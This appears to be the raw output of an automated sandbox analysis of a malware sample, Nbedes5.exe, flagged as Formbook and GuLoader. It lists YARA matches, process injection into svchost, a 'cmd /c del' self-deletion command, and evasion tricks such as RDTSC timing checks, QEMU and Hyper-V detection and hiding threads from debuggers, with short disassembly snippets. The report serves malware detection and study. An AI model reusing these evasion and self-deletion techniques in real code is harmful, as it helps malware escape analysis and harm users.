      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A060 NtClose,14_2_02C7A060
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A110 NtAllocateVirtualMemory,14_2_02C7A110
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79FE0 NtReadFile,14_2_02C79FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79F30 NtCreateFile,14_2_02C79F30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A05B NtClose,14_2_02C7A05B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A10B NtAllocateVirtualMemory,14_2_02C7A10B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79EEA NtCreateFile,14_2_02C79EEA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79FE2 NtReadFile,14_2_02C79FE2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C79F2A NtCreateFile,14_2_02C79F2A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F02A90_2_021F02A9
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E256E302_2_1E256E30
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26EBB02_2_1E26EBB0
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2F10022_2_1E2F1002
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24841F2_2_1E24841F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24B0902_2_1E24B090
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E230D202_2_1E230D20
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2541202_2_1E254120
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23F9002_2_1E23F900
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E301D552_2_1E301D55
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24D5E02_2_1E24D5E0
      Source: C:\Windows\explorer.exeCode function: 5_2_0614BA525_2_0614BA52
      Source: C:\Windows\explorer.exeCode function: 5_2_0614EA0C5_2_0614EA0C
      Source: C:\Windows\explorer.exeCode function: 5_2_061420725_2_06142072
      Source: C:\Windows\explorer.exeCode function: 5_2_061420695_2_06142069
      Source: C:\Windows\explorer.exeCode function: 5_2_0614A8825_2_0614A882
      Source: C:\Windows\explorer.exeCode function: 5_2_06143CF25_2_06143CF2
      Source: C:\Windows\explorer.exeCode function: 5_2_06143CE95_2_06143CE9
      Source: C:\Windows\explorer.exeCode function: 5_2_06146B1F5_2_06146B1F
      Source: C:\Windows\explorer.exeCode function: 5_2_06146B225_2_06146B22
      Source: C:\Windows\explorer.exeCode function: 5_2_061491525_2_06149152
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0325EBB014_2_0325EBB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03246E3014_2_03246E30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_03220D2014_2_03220D20
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0324412014_2_03244120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0322F90014_2_0322F900
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032F1D5514_2_032F1D55
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_032E100214_2_032E1002
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0323841F14_2_0323841F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0323B09014_2_0323B090
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7E1AE14_2_02C7E1AE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C69E4014_2_02C69E40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C69E3B14_2_02C69E3B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C62FB014_2_02C62FB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7E77F14_2_02C7E77F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7EC9314_2_02C7EC93
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C62D8714_2_02C62D87
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C62D9014_2_02C62D90
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: String function: 1E23B150 appears 32 times
      Source: Nbedes5.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Nbedes5.exe, 00000002.00000002.337439996.000000001E32F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nbedes5.exe
      Source: Nbedes5.exe, 00000002.00000002.336680926.000000001DEDB000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs Nbedes5.exe
      Source: Nbedes5.exe, 00000002.00000002.336629279.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Nbedes5.exe
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.336717561.000000001DFE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.506793601.000000000372F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.330459852.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.502533038.0000000002C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.498831427.0000000000180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/0@3/2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
      Source: Nbedes5.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Nbedes5.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Nbedes5.exeVirustotal: Detection: 11%
      Source: unknownProcess created: C:\Users\user\Desktop\Nbedes5.exe 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\Nbedes5.exe 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nbedes5.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess created: C:\Users\user\Desktop\Nbedes5.exe 'C:\Users\user\Desktop\Nbedes5.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Nbedes5.exe'Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.316273761.000000000E2B0000.00000002.00000001.sdmp
      Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.316954969.000000000F6E3000.00000004.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Nbedes5.exe, 00000002.00000002.337439996.000000001E32F000.00000040.00000001.sdmp, svchost.exe, 0000000E.00000002.504009556.0000000003200000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Nbedes5.exe, svchost.exe
      Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.316954969.000000000F6E3000.00000004.00000001.sdmp
      Source: Binary string: svchost.pdb source: Nbedes5.exe, 00000002.00000002.336655250.000000001DED0000.00000040.00000001.sdmp
      Source: Binary string: svchost.pdbUGP source: Nbedes5.exe, 00000002.00000002.336655250.000000001DED0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.316273761.000000000E2B0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: Nbedes5.exe PID: 5492, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Nbedes5.exe PID: 780, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: Nbedes5.exe PID: 5492, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Nbedes5.exe PID: 780, type: MEMORY
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_0040461D push edx; iretd 0_2_004045ED
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_00405E1F pushfd ; retf 0_2_00405F94
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_00403691 push B35EBC04h; ret 0_2_00403696
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_004064AF pushad ; ret 0_2_004064CA
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_00405740 pushad ; iretd 0_2_0040573E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_0040575D pushad ; iretd 0_2_0040573E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_00403B05 push 2B54F807h; ret 0_2_00403B0A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_0040570A pushad ; iretd 0_2_0040573E
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_0040630F pushfd ; retf 0_2_00406320
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_004067CE push edx; ret 0_2_004067D6
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_004045E4 push edx; iretd 0_2_004045ED
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_00405FA7 pushfd ; retf 0_2_00405F94
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E28D0D1 push ecx; ret 2_2_1E28D0E4
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0327D0D1 push ecx; ret 14_2_0327D0E4
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C6E2C3 push ecx; retf 14_2_02C6E2C6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C68286 push ds; retf 14_2_02C6828A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7DABE push esi; ret 14_2_02C7DACE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C76B0F push edx; ret 14_2_02C76B1E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7D0D2 push eax; ret 14_2_02C7D0D8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7D0DB push eax; ret 14_2_02C7D142
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7D085 push eax; ret 14_2_02C7D0D8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C70854 push FFFFFFFDh; iretd 14_2_02C70856
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7E186 push dword ptr [B2588A5Eh]; ret 14_2_02C7E1A6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7E109 push ss; retf 14_2_02C7E113
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7D13C push eax; ret 14_2_02C7D142
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_02C7A796 push eax; retf 14_2_02C7A79C

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xE4
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\Nbedes5.exeRDTSC instruction interceptor: First address: 00000000021F40DA second address: 00000000021F40DA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F7C70391478h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dl, cl 0x00000021 pop ecx 0x00000022 test edi, 83F80AC1h 0x00000028 add edi, edx 0x0000002a test ch, bh 0x0000002c dec ecx 0x0000002d cmp ecx, 00000000h 0x00000030 jne 00007F7C70391456h 0x00000032 cmp dh, FFFFFFAEh 0x00000035 push ecx 0x00000036 call 00007F7C70391496h 0x0000003b call 00007F7C7039148Ah 0x00000040 lfence 0x00000043 mov edx, dword ptr [7FFE0014h] 0x00000049 lfence 0x0000004c ret 0x0000004d mov esi, edx 0x0000004f pushad 0x00000050 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\Nbedes5.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: Nbedes5.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\Nbedes5.exeRDTSC instruction interceptor: First address: 00000000021F40DA second address: 00000000021F40DA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F7C70391478h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp dl, cl 0x00000021 pop ecx 0x00000022 test edi, 83F80AC1h 0x00000028 add edi, edx 0x0000002a test ch, bh 0x0000002c dec ecx 0x0000002d cmp ecx, 00000000h 0x00000030 jne 00007F7C70391456h 0x00000032 cmp dh, FFFFFFAEh 0x00000035 push ecx 0x00000036 call 00007F7C70391496h 0x0000003b call 00007F7C7039148Ah 0x00000040 lfence 0x00000043 mov edx, dword ptr [7FFE0014h] 0x00000049 lfence 0x0000004c ret 0x0000004d mov esi, edx 0x0000004f pushad 0x00000050 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exeRDTSC instruction interceptor: First address: 00000000021F40FC second address: 00000000021F40FC instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F7C70395120h 0x0000001f popad 0x00000020 call 00007F7C70394D75h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exeRDTSC instruction interceptor: First address: 00000000005640FC second address: 00000000005640FC instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F7C70391880h 0x0000001f popad 0x00000020 call 00007F7C703914D5h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002C698E4 second address: 0000000002C698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002C69B5E second address: 0000000002C69B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F02A9 rdtsc 0_2_021F02A9
      Source: C:\Windows\explorer.exe TID: 6156Thread sleep time: -46000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exe TID: 7132Thread sleep time: -36000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000005.00000002.523167988.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: Nbedes5.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
      Source: explorer.exe, 00000005.00000000.312839969.0000000008907000.00000004.00000001.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&I
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000005.00000000.310197590.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
      Source: Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: vmicvss
      Source: explorer.exe, 00000005.00000000.295484560.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000005.00000000.310420433.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000005.00000000.310542436.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
      Source: Nbedes5.exe, 00000000.00000002.274788775.000000000484A000.00000004.00000001.sdmp, Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: Nbedes5.exe, 00000002.00000002.332530112.000000000236A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
      Source: explorer.exe, 00000005.00000000.307774949.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F02A9 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,000000000_2_021F02A9
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\Nbedes5.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F02A9 rdtsc 0_2_021F02A9
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F24FB LdrInitializeThunk,0_2_021F24FB
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F4561 mov eax, dword ptr fs:[00000030h]0_2_021F4561
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F223C mov eax, dword ptr fs:[00000030h]0_2_021F223C
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F184B mov eax, dword ptr fs:[00000030h]0_2_021F184B
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F3E60 mov eax, dword ptr fs:[00000030h]0_2_021F3E60
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F46A3 mov eax, dword ptr fs:[00000030h]0_2_021F46A3
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F174A mov eax, dword ptr fs:[00000030h]0_2_021F174A
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F3B46 mov eax, dword ptr fs:[00000030h]0_2_021F3B46
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 0_2_021F11CC mov eax, dword ptr fs:[00000030h]0_2_021F11CC
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23E620 mov eax, dword ptr fs:[00000030h]2_2_1E23E620
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2EFE3F mov eax, dword ptr fs:[00000030h]2_2_1E2EFE3F
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23C600 mov eax, dword ptr fs:[00000030h]2_2_1E23C600
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23C600 mov eax, dword ptr fs:[00000030h]2_2_1E23C600
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E23C600 mov eax, dword ptr fs:[00000030h]2_2_1E23C600
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E253A1C mov eax, dword ptr fs:[00000030h]2_2_1E253A1C
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A61C mov eax, dword ptr fs:[00000030h]2_2_1E26A61C
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E26A61C mov eax, dword ptr fs:[00000030h]2_2_1E26A61C
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E24766D mov eax, dword ptr fs:[00000030h]2_2_1E24766D
      Source: C:\Users\user\Desktop\Nbedes5.exeCode function: 2_2_1E2EB260 mov eax, dword ptr fs:[00000030h]2_2_1E2EB260
